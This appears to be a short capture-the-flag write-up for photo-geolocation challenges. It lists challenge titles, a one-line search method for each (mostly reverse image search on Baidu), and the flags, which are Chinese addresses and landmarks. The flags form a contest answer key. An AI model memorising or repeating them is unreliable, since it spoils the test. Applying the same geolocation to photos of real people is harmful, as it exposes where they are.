Baidu image search plus keyword search.

SICTF{北京市_顺义区_新顺南大街_北京华联顺义金街购物中心}

Overpass (天桥)

Identify the wutong trees, then keyword-search for the city.

SICTF{陕西省西安市碑林区友谊路}

Pretty Lady O.o (美女姐姐O.o)

Baidu image search plus keyword search.

SICTF{福建省福州市仓山区烟台山公园}

The Pagoda Subdues the River Demon (宝塔镇河妖)

Baidu image search plus keyword search.

SICTF{山东省济宁市汶上县太子灵踪塔}